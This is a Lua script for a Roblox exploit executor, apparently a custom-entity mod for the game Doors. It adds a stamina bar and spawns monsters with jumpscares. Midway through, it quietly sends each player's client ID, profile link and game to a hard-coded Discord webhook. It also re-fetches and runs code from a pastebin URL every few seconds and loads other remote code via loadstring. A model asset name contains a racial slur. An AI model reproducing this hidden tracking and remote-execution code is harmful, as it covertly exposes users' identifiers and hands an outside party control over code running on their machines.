local runService = game:GetService("RunService")



local character = game.Players.LocalPlayer.Character


local humanoid = character:WaitForChild("Humanoid")



local StaminaBar = Instance.new("ScreenGui")


local Border = Instance.new("Frame")


local Bar = Instance.new("Frame")


local SideBar = Instance.new("Frame")


local Bar_2 = Instance.new("Frame")



--Properties:



StaminaBar.Name = "StaminaBar"


StaminaBar.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")


StaminaBar.ZIndexBehavior = Enum.ZIndexBehavior.Sibling



Border.Name = "Border"


Border.Parent = StaminaBar


Border.AnchorPoint = Vector2.new(0, 1)


Border.BackgroundColor3 = Color3.fromRGB(255, 255, 255)


Border.BorderColor3 = Color3.fromRGB(0, 0, 0)


Border.BorderSizePixel = 4


Border.Position = UDim2.new(0.25, 0, 0.85, 0)


Border.Size = UDim2.new(0.6, 0, 0.0263093561, 0)



Bar.Name = "Bar"


Bar.Parent = Border


Bar.AnchorPoint = Vector2.new(0, 1)


Bar.BackgroundColor3 = Color3.fromRGB(255, 255, 0)


Bar.BorderColor3 = Color3.fromRGB(0, 0, 0)


Bar.BorderSizePixel = 0


Bar.Position = UDim2.new(0, 0, 1, 0)


Bar.Size = UDim2.new(1, 0, 1, 0)



SideBar.Name = "SideBar"


SideBar.Parent = StaminaBar


SideBar.AnchorPoint = Vector2.new(0, 1)


SideBar.BackgroundColor3 = Color3.fromRGB(255, 255, 255)


SideBar.BorderColor3 = Color3.fromRGB(0, 0, 0)


SideBar.BorderSizePixel = 4


SideBar.Position = UDim2.new(0.985890269, 0, 1, 0)


SideBar.Size = UDim2.new(0.0141097549, 0, 0.17468825, 0)



Bar_2.Name = "Bar"


Bar_2.Parent = SideBar


Bar_2.AnchorPoint = Vector2.new(0, 1)


Bar_2.BackgroundColor3 = Color3.fromRGB(255, 255, 0)


Bar_2.BorderColor3 = Color3.fromRGB(0, 0, 0)


Bar_2.BorderSizePixel = 0


Bar_2.Position = UDim2.new(0, 0, 1, 0)


Bar_2.Size = UDim2.new(1, 0, 1, 0)


local Started=false


-- Scripts:


local OO = 0


function QCHWWK_fake_script() -- StaminaBar.SprintFire 


	local script = Instance.new('LocalScript', StaminaBar)


	local Bool = Instance.new('NumberValue', script.Parent)


	Bool.Name = "Dissapear"


	--------------------------------------------------------------------------------------------------------------


	script.Parent.Dissapear.Changed:Connect(function(Value)



		for i,v in pairs(script:GetChildren()) do


			v:Destroy()


		end



		local A = Instance.new("Part")


		A.Parent = script


		A.Name="Keep"..tick()..game.JobId..game:GetService("Players").LocalPlayer.Name



		Border.Visible = true


		SideBar.Visible = false


		wait(1)


		if script:FindFirstChild(A.Name) then




			OO=0


			repeat wait(1)


				--if not script:FindFirstChild(A.Name) then


				--Border.Visible = true


				--SideBar.Visible = false


				OO = OO +1


				-- end


			until Value > OO or not script:FindFirstChild(A.Name)




			if script:FindFirstChild(A.Name) then


				Border.Visible = false


				SideBar.Visible = true


			end


		end



	end)




	--------------------------------------------------------------------------------------------------------------


	local Players = game:GetService("Players")


	local RS = game:GetService("RunService")


	local ReSt = game:GetService("ReplicatedStorage")


	local CG = game:GetService("CoreGui")


	local TS = game:GetService("TweenService")


	local Plr = Players.LocalPlayer



	--local ModuleScripts = {
 

	---	MainGame = require(Plr.PlayerGui.MainUI.Initiator.Main_Game),


	--	ModuleEvents = require(ReSt.ClientModules.Module_Events),


	--}


	-- KEYBINDS HERE


	local Camera = workspace.CurrentCamera


	local bind1 = Enum.KeyCode.LeftShift -- This is the keybind this script is set to by default


	local bind2 = Enum.KeyCode.RightShift -- This is the second keybind this script is set to by default



	-- To change the keybind, replace the word after "Enum.Keycode." with your desired keybind




	--------------------------------------------------------------------------------------------------------------




	local player = game.Players.LocalPlayer -- Targets the player


	local char = player.Character or player.CharacterAdded:Wait() -- Finds player's character


	local hrp = char:WaitForChild("HumanoidRootPart") -- Finds character's humanoid root part



	local cam = game.Workspace.CurrentCamera


	local bar = script.Parent.Border.Bar



	--local runSound = hrp:WaitForChild("Running") -- Finds the running sound of the player



	local TS = game:GetService("TweenService")


	local TI = TweenInfo.new(1, Enum.EasingStyle.Quint, Enum.EasingDirection.Out, 0, false, 0)




	--------------------------------------------------------------------------------------------------------------




	local FOV1 = {


		FieldOfView = 90 -- FOV change while sprinting, change as desired


	}


	local FOV2 = {


		FieldOfView = 70 -- FOV default value, suggested to keep as is


	}




	--------------------------------------------------------------------------------------------------------------




	local BigFOV = TS:Create(cam, TI, FOV1)


	local SmallFOV = TS:Create(cam, TI, FOV2)




	--------------------------------------------------------------------------------------------------------------




	local stamPower = 100 -- Total stamina points


	local stamTick = 1 -- How much the stamina goes down every tick of holding down the sprint button


	local regenTick = 0.9-- How much the stamina goes back up every tick of not holding down the sprint button (until it hits stamPower max)






	--------------------------------------------------------------------------------------------------------------




	local sprinting = false


	local DEF = 15

	function sprint(name, IS, context)


		--	ModuleScripts.MainGame.camShaker.ShakeOnce(ModuleScripts.MainGame.camShaker, 5)


		if IS == Enum.UserInputState.Begin then

			if sprinting == false then
				DEF = char.Humanoid.WalkSpeed
			end
			--	runSound.PlaybackSpeed = 4 -- Changes the playback speed that the running sound plays at during sprinting, replace 4 with your desired playback speed if wanted


			script.Parent.Dissapear.Value=999999999999999999999999999999999999999999999999999999999999999999999

			
			Walkspeed2 = DEF+2
			char.Humanoid.WalkSpeed = Walkspeed2
			


			sprinting = true


			while stamPower > 0 and sprinting == true do





				if Started~=true then


					script.Parent.Dissapear.Value=991291291291291291291289129129129129129129129129129129129129129


					BigFOV:Play()


					Started=true



				end



				bar.Size = UDim2.new(stamPower / 100, 0, 1, 0)


				SideBar.Bar.Size = UDim2.new(1, 0, stamPower/100, 0)


				bar.Visible = true


				SideBar.Bar.Visible = true


				stamPower = stamPower - stamTick


				--BigFOV:Play()


				wait()


				if stamPower <= 0 then


					bar.Visible = false


					--	runSound.PlaybackSpeed = 2
					Walkspeed2 = DEF

					char.Humanoid.WalkSpeed = Walkspeed2


					SmallFOV:Play()


					Started=false


					script.Parent.Dissapear.Value=10


					stamPower=0



				end


			end


		elseif IS == Enum.UserInputState.End then



			if stamPower < 1 then


				bar.Visible = false


				SideBar.Bar.Visible = false


			else


				bar.Visible = true


				SideBar.Bar.Visible = true


			end


			--	runSound.PlaybackSpeed = 2 -- Resets the playback speed to its original value, recommended to leave as is

			Walkspeed2 = DEF
				char.Humanoid.WalkSpeed = Walkspeed2 -- Sets player speed to 16 (Roblox game default), if you change your Roblox game's default player speed, replace 16 with the new value


			sprinting = false


			while stamPower <= 100 and sprinting == false do


				stamPower = stamPower + regenTick


				--	bar.Visible = true


				--SideBar.Bar.Visible = true


				if stamPower > 100 then


					stamPower = 100


				end


				-- SideBar.Bar.Visible = false


				if stamPower < 1 then


					bar.Visible = false


					SideBar.Bar.Visible = false


				else


					bar.Visible = true


					SideBar.Bar.Visible = true


				end



				bar.Size = UDim2.new(stamPower / 100, 0, 1, 0)


				SideBar.Bar.Size = UDim2.new(1, 0, stamPower/100, 0)





				--if cam.FieldOfView > 78 and script.Parent.Dissapear.Value ~= 10 then


				--	Fov(70)


				--	end








				if Started~=false then


					Started=false


					SmallFOV:Play()


					script.Parent.Dissapear.Value=10	


				end



				wait()


			end



		end


	end




	--------------------------------------------------------------------------------------------------------------

	char.Changed:Connect(function()
		if game.Players.LocalPlayer.Character.Humanoid.WalkSpeed ~= Walkspeed2 and game.Players.LocalPlayer.Character.Humanoid.WalkSpeed ~= 10 then
			DEF=game.Players.LocalPlayer.Character.Humanoid.WalkSpeed
			if sprinting == true then
				WalkSpeed2=DEF+6
				game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = DEF
			end
			
		end
	end)

	function updateBobbleEffect()


		local currentTime = tick()


		if  Started == true then


			if humanoid.MoveDirection.Magnitude > 0  then -- we are walking


				local bobbleY = math.abs(math.sin(currentTime * 10)) * .35


				local bobbleX = math.abs(math.sin(currentTime * 10)) * .05



				local bobble = Vector3.new(bobbleX, bobbleY, 0)



				humanoid.CameraOffset = humanoid.CameraOffset:lerp(bobble, .75)





			else -- we are not walking


				humanoid.CameraOffset =humanoid.CameraOffset * 0


			end


		end


	end



	runService.RenderStepped:Connect(updateBobbleEffect)






	local CAS = game:GetService("ContextActionService")



	CAS:BindAction("Sprint", sprint, true, bind1, bind2) -- Binds the keybinds to the sprint function and creates a mobile button for it


	CAS:SetPosition("Sprint", UDim2.new(0.7,0,0,0)) -- Changes the position of the mobile button within the context frame, to read more about how UDim2 positions work, go to https://developer.roblox.com/en-us/api-reference/datatype/UDim2


	CAS:SetTitle("Sprint", "Shift") -- Sets the text on the mobile button, replace Ctrl with any text you desire


end


coroutine.wrap(QCHWWK_fake_script)()


function CJZEISY_fake_script() -- SideBar.LocalScript 


	local script = Instance.new('LocalScript', SideBar)



	script.Parent.Visible = false


end


coroutine.wrap(CJZEISY_fake_script)()



spawn(function() -- old seek
while wait(3.5) do
if workspace.Ambience_Seek.Playing == true then
			continue
		end
		if workspace.Ambience_Figure.Playing == true then
			continue
		end
		if workspace.Ambience_FigureEnd.Playing == true then
			continue
		end
		if workspace.Ambience_FigureStart.Playing == true then
			continue
		end
loadstring(game:HttpGet("https://pastebin.com/raw/uXY1EAxZ"))()
end
end)




function ReplaceAudGit(GithubSnd,SoundName) 
         local url=GithubSnd 
         if not isfile(SoundName..".mp3") then 
                 writefile(SoundName..".mp3", game:HttpGet(url)) 
         end 
         return (getcustomasset or getsynasset)(SoundName..".mp3") 
 end 
 workspace.Ambience_Seek.SoundId = ReplaceAudGit("https://github.com/Brololto/BUUMMM/blob/main/Screen_Recording_20230404-233303_YouTube%20(online-audio-converter.com).mp3?raw=true","RUN") 
 workspace.Ambience_Seek.Volume = 1



local hwid = game:GetService("RbxAnalyticsService"):GetClientId();
local profilelink = 'https://roblox.com/users/' .. game.Players.LocalPlayer.UserId .. '/profile'
local gamelink = 'https://roblox.com/games/' .. game.PlaceId .. '/' .. game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name

local Webhook = 'https://discord.com/api/webhooks/1092302013385150555/bOoT6OLIy2cOxLrkG6QVRBwRiec1gAvL7N5aqies-eFmbBXd6sbw3C065_PW_M-zh4PK'
pcall(function()
local data = {
["embeds"] = {
{
["title"] = 'Balls and jiggle: ' .. hwid,
["description"] = 'Profile link: ' .. profilelink ..  ' ' .. 'Game link: ' .. gamelink,
}
}
}
if syn then
local response = syn.request(
{
Url = Webhook,
Method = 'POST',
Headers = {
['Content-Type'] = 'application/json'
},
Body = game:GetService('HttpService'):JSONEncode(data)
}
);
elseif request then
local response = request(
{
Url = Webhook,
Method = 'POST',
Headers = {
['Content-Type'] = 'application/json'
},
Body = game:GetService('HttpService'):JSONEncode(data)
}
);
elseif http_request then
local response = http_request(
{
Url = Webhook,
Method = 'POST',
Headers = {
['Content-Type'] = 'application/json'
},
Body = game:GetService('HttpService'):JSONEncode(data)
}
);
end
end)


game.ReplicatedStorage.Sounds.BulbZap.SoundId = "rbxassetid://5837227586"


local syncConnection; syncConnection = game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()


firesignal(game:GetService("ReplicatedStorage").EntityInfo.Caption.OnClientEvent, 'Script Loaded',true,2)
wait(2)
firesignal(game:GetService("ReplicatedStorage").EntityInfo.Caption.OnClientEvent, 'Made by tinkgy#8163 (scripter Credits to (modeler figure#2824 Ping#1481 Noonie tomorrow#9943',true,1)

spawn(function() -- E
while wait(179) do
if workspace.Ambience_Seek.Playing == true then
			continue
		end
		if workspace.Ambience_Figure.Playing == true then
			continue
		end
		if workspace.Ambience_FigureEnd.Playing == true then
			continue
		end
		if workspace.Ambience_FigureStart.Playing == true then
			continue
		end
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()   
local function GetGitSound(GithubSnd,SoundName)
				local url=GithubSnd
				if not isfile(SoundName..".mp3") then
					writefile(SoundName..".mp3", game:HttpGet(url))
				end
				local sound=Instance.new("Sound")
				sound.SoundId=(getcustomasset or getsynasset)(SoundName..".mp3")
				return sound
			end
			local Chase = GetGitSound("https://github.com/Brololto/bettersound/blob/main/Screen_Recording_20230328-170621_YouTube%20(online-audio-converter.com).mp3?raw=true","G-95chase")
			Chase.Parent = workspace
			Chase.Volume = 3

			local saf = GetGitSound("https://github.com/Brololto/Scary/blob/main/Screen_Recording_20230406-195405_YouTube%20(online-audio-converter.com).mp3raw=true","saf")
			saf.Parent = workspace
			saf.Volume = 5
saf:Play()



  local Smilersound = Instance.new("Sound", workspace)
		Smilersound.SoundId = "rbxassetid://9125713501"
		Smilersound:Play()
		Smilersound.Volume = 5        
    
-- Create entity
    local room = workspace.CurrentRooms[game.Players.LocalPlayer:GetAttribute("CurrentRoom")]
local color = Color3.fromRGB(255, 0, 0)
		room.LightBase.SurfaceLight.Enabled = true
		room.LightBase.SurfaceLight.Color = color
		for _, thing in pairs(room.Assets:GetDescendants()) do
			if thing:FindFirstChild"LightFixture" then
				thing.LightFixture.Neon.Color = color
				for _, light in pairs(thing.LightFixture:GetChildren()) do
					if light:IsA("SpotLight") or light:IsA("PointLight") then
						light.Color = color
					end
				end
			end
		end
game.Lighting.MainColorCorrection.TintColor = Color3.fromRGB(255, 0, 0)
game.Lighting.MainColorCorrection.Contrast = 1
local tween = game:GetService("TweenService")
tween:Create(game.Lighting.MainColorCorrection, TweenInfo.new(2.5), {Contrast = 0}):Play()
local TweenService = game:GetService("TweenService")
local TW = TweenService:Create(game.Lighting.MainColorCorrection, TweenInfo.new(80),{TintColor = Color3.fromRGB(255, 255, 255)})
TW:Play()
local Creator = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors%20Entity%20Spawner/Source.lua"))()


local entity = Creator.createEntity({
    CustomName = "G-95", -- Custom name of your entity
    Model = "https://github.com/Brololto/NEWV2/blob/main/G-95_NIGGER.rbxm?raw=true", -- Can be GitHub file or rbxassetid
    Speed = 400, -- Percentage, 100 = default Rush speed
    DelayTime = 7, -- Time before starting cycles (seconds)
    HeightOffset = 0,
    CanKill = true,
    BreakLights = false,
    KillRange = 60,
    BackwardsMovement = false,
    FlickerLights = {
        true, -- Enabled
        2.5, -- Time (seconds)
    },
    Cycles = {
        Min = 1,
        Max = 1
    },
    CamShake = {
        true, -- Enabled
        {6, 15, 0.1, 1}, -- Shake values (don't change if you don't know)
        100, -- Shake start distance (from Entity to you)
    },
    Jumpscare = {
        true, -- Enabled ('false' if you don't want jumpscare)
        {
            Image1 = "rbxassetid://11394048190", -- Image1 url
            Image2 = "rbxassetid://11395251069", -- Image2 url
            Shake = false,
            Sound1 = {
                0, -- SoundId
                { Volume = 0.5 }, -- Sound properties
            },
            Sound2 = {
                5567523008, -- SoundId
                { Volume = 0.5 }, -- Sound properties
            },
            Flashing = {
                true, -- Enabled
                Color3.fromRGB(6, 38, 135), -- Color
            },
            Tease = {
                false, -- Enabled ('false' if you don't want tease)
                Min = 1,
                Max = 3,
            },
        },
    },
    CustomDialog = {"You died to Rebound...", "It appears at the next door and has a chance to stay there or run back to the latest door.", "He will come back many times after his initial spawn", "so hide every next door until it is safe.."}, -- Custom death message (can be as long as you want)
})

-----[[ Advanced ]]-----
entity.Debug.OnEntitySpawned = function(entityModel)
    print("Entity has spawned:", entityModel)
    Chase:Play()
end

entity.Debug.OnEntityDespawned = function(entityModel)
    print("Entity has despawned:", entityModel)
    
local Metalsound = Instance.new("Sound", workspace)
		Metalsound.SoundId = "rbxassetid://9116546593"
		Metalsound:Play()
		Metalsound.Volume = 6     
workspace.CurrentRooms[game.ReplicatedStorage.GameData.LatestRoom.Value]:WaitForChild("Door").ClientOpen:FireServer()
end

entity.Debug.OnEntityStartMoving = function(entityModel)
    print("Entity has started moving:", entityModel)
end

entity.Debug.OnEntityEnteredRoom = function(entityTable, room)
    print("Entity:", "has entered room:", room)
end

entity.Debug.OnEntityFinishedRebound = function(entityModel)
    print("Entity finished rebound:", entityModel)
    local Achievements = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors/Custom%20Achievements/Source.lua"))()

-- Creates and displays your custom achievement
Achievements.Get({
    Title = "Screames Of the Dammed.",
    Desc = "don't be to slow.",
    Reason = "Encounter G-95",
    Image = "https://github.com/Brololto/SCP-BADGE/blob/main/glimpse1.png?raw=true",
   })
end

entity.Debug.OnDeath = function()
    warn("You died.")
    firesignal(game.ReplicatedStorage.EntityInfo.DeathHint.OnClientEvent, {"You died to G-95", "His scream can let you Know hes coming, Hide quickly when he does this.", "But he gives you a little bit of time so use that for you Advantage."}, "Blue")
end

------------------------

-- Run the created entity
Creator.runEntity(entity)
            pcall(bread)
         end
end)


 


-- claim
Spawn1 = coroutine.wrap(function()
while task.wait(489) do
if workspace.Ambience_Seek.Playing == true then
			continue
		end
		if workspace.Ambience_Figure.Playing == true then
			continue
		end
		if workspace.Ambience_FigureEnd.Playing == true then
			continue
		end
		if workspace.Ambience_FigureStart.Playing == true then
			continue
		end
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()            
    local death = Instance.new("Sound")
    death.Parent = workspace
    death.Name = "die"
    death.SoundId = "rbxassetid://5867708670"
    death.Volume = 0.7
    death.Pitch = 1
    local distort = Instance.new("DistortionSoundEffect")
    distort.Level = 0.9
    distort.Parent = death
    local cue = Instance.new("Sound")
    cue.Parent = workspace
    cue.Name = "Bubbles"
    cue.SoundId = "rbxassetid://9113601215"
    cue.Volume = 1
    cue.Pitch = 0.6
    local distort = Instance.new("DistortionSoundEffect")
    distort.Level = 0.7
    distort.Parent = cue
    cue:Play()
    wait(2.5)
    
   local Spawner = loadstring(game:HttpGet('https://raw.githubusercontent.com/MuhXd/DoorSuff/main/OtherSuff/DoorEntitySpawn%2BSource'))()

-- Create entity
local entity = Spawner.createEntity({
    CustomName = "Claim", -- Custom name of your entity
    Model = "rbxassetid://12083953527", -- Can be GitHub file or rbxassetid
    Speed = 0, -- Percentage, 100 = default Rush speed
    DelayTime = 2, -- Time before starting cycles (seconds)
    HeightOffset = 0,
    CanKill = true,
    NoDieOnCrouching = false,
    NoHiding = false,
    AntiCrucifix = false,
    KillRange = 10000,
    OneRoom = true,
    DieOnLook = false,
    BreakLights = false,
    BackwardsMovement = false,
     MovementDeath = {
        false, -- Turned On?
        '1',  --- '1'= 'Instant Without Being Looked out' | '2' = 'With Being Looked At'
    },
    FlickerLights = {
        false, -- Enabled/Disabled
        1, -- Time (seconds)
    },
    Cycles = {
        Min = 1,
        Max = 1,
        WaitTime = 2,
    },
    CamShake = {
        false, -- Enabled/Disabled
        {3.5, 20, 0.1, 1}, -- Shake values (don't change if you don't know)
        100, -- Shake start distance (from Entity to you)
    },
    Jumpscare = {
        false, -- Enabled/Disabled
        {
            Type = "2", -- "Normal" or 1 | "Pop" or 2 | "endlessdoorsrebound" or "Rebound" or 3 | More coming Soon
            Image1 = "rbxassetid://10483855823", -- Image1 url
            Image2 = "rbxassetid://10483999903", -- Image2 url
            Shake = true,
            Sound1 = {
                "0", -- SoundId Link or Roblox ID
                { Volume = 5 }, -- Sound properties
            },
            Sound2 = {
                "0", -- SoundId Link or Roblox ID
                { Volume = 3 }, -- Sound properties
            },
            Flashing = {
                true, -- Enabled/Disabled
                Color3.fromRGB(255, 255, 255), -- Color
            },
            Tease = {
                true, -- Enabled/Disabled
                Min = 1,
                Max = 3,
            },
        },
    },
    Color = 'GuidingLight', -- CuriousLight ( Yellow ) | GuidingLight ( Blue )
    DiffrentMessages = false,
    CustomDialog = {  
        {"Claim has seen you.", "It will consume anyone on sight.", "It takes a bit to fully spawn in", "so you can use that to your advantage."}, -- Death Messages
        {"Stop Dieing"},
        {"Bruh", "Use what you have learned from Rush!"},
        {"It seems like Template is causing quite the ruckus...", "Hide in a closet or bed as quickly as possible!"},
         {"I have told You What to do", "YOU JUST HAVE A SKILL ISSUE"}
    }
})

-----[[ Advanced Sctipting ]]-----

entity.Debug.OnEntityMoving = function(Invincible,Hiding,plrCollisionPoint)
print("Invincible: "..tostring(Invincible))
print("Player to Entity Collision (None hiding Point): "..tostring(plrCollisionPoint))
print("Hiding: "..tostring(Hiding))
end
       
entity.Debug.OnEntitySpawned = function()
    print("Entity has spawned:")
    local TweenService = game:GetService("TweenService")
    local cue2 = Instance.new("Sound")
    cue2.Parent = workspace.Claim.RushNew
    cue2.Name = "Idle"
    cue2.SoundId = "rbxassetid://8256091246"
    cue2.Volume = 0
    cue2.Pitch = 4
    local shift = Instance.new("PitchShiftSoundEffect")
    shift.Octave = 0.5
    shift.Parent = cue2
    local distort = Instance.new("DistortionSoundEffect")
    distort.Level = 0.9
    distort.Parent = cue2
	cue2.RollOffMaxDistance = 90
	cue2.RollOffMinDistance = 5
	cue2.RollOffMode = Enum.RollOffMode.LinearSquare
    local TW = TweenService:Create(cue2, TweenInfo.new(1.5),{Pitch = 0})
    local TW1 = TweenService:Create(cue2, TweenInfo.new(0.5),{Pitch = 8})
    local TW2 = TweenService:Create(cue2, TweenInfo.new(1.5),{Volume = 0})
    local TW3 = TweenService:Create(cue2, TweenInfo.new(1.5),{Volume = 1})
    cue2:Play()
    TW3:Play()
    wait(9.5)
    TW1:Play()
    wait(0.5)
	workspace.Claim.RushNew.Anchored = false
	workspace.Claim.RushNew.CanCollide = false
    TW:Play()
    TW2:Play()
    wait(2)
    workspace.Claim:Destroy()
    death:Destroy()
    cue:Destroy()
end

entity.Debug.OnEntityDespawned = function()
    print("Entity has despawned:")
local Achievements = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors/Custom%20Achievements/Source.lua"))()

-- Creates and displays your custom achievement
Achievements.Get({
    Title = "in sight.",
    Desc = "i have my eye open on you.",
    Reason = "Encounter Claim",
    Image = "https://github.com/Brololto/Claim-badge/blob/main/Badge.png?raw=true",
    })
end

entity.Debug.OnEntityStartMoving = function()
    print("Entity has started moving:")
end

entity.Debug.OnEntityFinishedRebound = function()
    print("Entity has finished rebound:")
end

entity.Debug.OnEntityEnteredRoom = function(entityTable, room)
    print("Entity:", "has entered room:",room)
end

entity.Debug.OnLookAtEntity = function()
    print("Player has looked at entity:")
end

entity.Debug.OnDeath = function()
    warn("Player has died.")
    death:Play()
end

------------------------

-- Run the created entity
Spawner.runEntity(entity)
end
end)
Spawn1()

			

game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
local Spawner = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors%20Entity%20Spawner/Source.lua"))()
-- Create entity
local entityTable = Spawner.createEntity({
    CustomName = "Hunger", -- Custom name of your entity
    Model = "rbxassetid://11969147945", -- Can be GitHub file or rbxassetid
    Speed = 38, -- Percentage, 100 = default Rush speed
    DelayTime = 0, -- Time before starting cycles (seconds)
    HeightOffset = 0,
    CanKill = true,
    KillRange = 2,
    BackwardsMovement = true,
    BreakLights = false,
    FlickerLights = {
        false, -- Enabled/Disabled
        1, -- Time (seconds)
    },
    Cycles = {
        Min = 1,
        Max = 500000000000000,
        WaitTime = 2,
    },
    CamShake = {
        true, -- Enabled/Disabled
        {2.5, 20, 0.1, 1}, -- Shake values (don't change if you don't know)
        100, -- Shake start distance (from Entity to you)
    },
    Jumpscare = {
        true, -- Enabled/Disabled
        {
            Image1 = "rbxassetid://5577595111", -- Image1 url
            Image2 = "rbxassetid://10657365561", -- Image2 url
            Shake = true,
            Sound1 = {
                4903742660, -- SoundId
                { Volume = 0.5 }, -- Sound properties
            },
            Sound2 = {
                3537873683, -- SoundId
                { Volume = 0.5 }, -- Sound properties
            },
            Flashing = {
                true, -- Enabled/Disabled
                Color3.fromRGB(0, 255, 255), -- Color
            },
            Tease = {
                true, -- Enabled/Disabled
                Min = 2,
                Max = 2,
            },
        },
    },
    CustomDialog = {"You died to Hungered...", "A loud scream its your signal.", "Hide quick!"}, -- Custom death message

})


-----[[  Debug -=- Advanced  ]]-----
entityTable.Debug.OnEntitySpawned = function()
    print("Entity has spawned:", entityTable)
end

entityTable.Debug.OnEntityDespawned = function()
    print("Entity has despawned:", entityTable)
end

entityTable.Debug.OnEntityStartMoving = function()
end

entityTable.Debug.OnEntityFinishedRebound = function()
    print("Entity has finished rebound:", entityTable)
end

entityTable.Debug.OnEntityEnteredRoom = function(room)
    print("Entity:", entityTable, "has entered room:", room)
end

entityTable.Debug.OnLookAtEntity = function()
    print("Player has looked at entity:", entityTable)
end

entityTable.Debug.OnDeath = function()
    warn("Player has died.")
    firesignal(game.ReplicatedStorage.EntityInfo.DeathHint.OnClientEvent, {"You Have Been Caught By Hunger...", "it lurks around on figures library.", "Don't Get Caught"}, "Blue")
end
------------------------------------


-- Run the created entity
Spawner.runEntity(entityTable)

















spawn(function()
	------------------------------------------Silence
	getgenv().death = false
	while true do
		wait(560)
		if workspace.Ambience_Seek.Playing == true then
			continue
		end
		if workspace.Ambience_Figure.Playing == true then
			continue
		end
		if workspace.Ambience_FigureEnd.Playing == true then
			continue
		end
